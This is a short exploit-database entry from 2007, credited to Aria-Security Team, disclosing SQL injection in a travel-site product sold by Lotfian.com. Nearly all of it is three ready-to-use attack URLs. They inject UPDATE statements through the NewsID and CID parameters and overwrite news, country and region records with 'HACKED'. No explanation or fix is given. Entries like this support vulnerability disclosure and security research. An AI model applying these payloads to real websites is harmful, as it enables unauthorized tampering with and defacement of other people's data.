Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln

2007-12-10T00:00:00
ID EDB-ID:4710
Type exploitdb
Reporter Aria-Security Team
Modified 2007-12-10T00:00:00

Description

Lotfian.com DATABASE DRIVEN TRAVEL SITE SQL Injection Vuln. Webapps exploit for php platform

                                        
                                            Aria-Security Team
http://Aria-Security.Net
-----------------------------
DATABASE DRIVEN TRAVEL SITE
Vendor: Lotfian.com

NewsDetails.asp?NewsID=''UPDATE gtsNews set NewsDescription='HACKED' UPDATE gtsNews set NewsTitle='HACKED'

Destination.asp?CID=''UPDATE gtsCountry set CountyName='HACKED'

RegionDetails.asp?CID=''UPDATE gtsCountryRegion set CountryRegionName='hacked';--

# milw0rm.com [2007-12-10]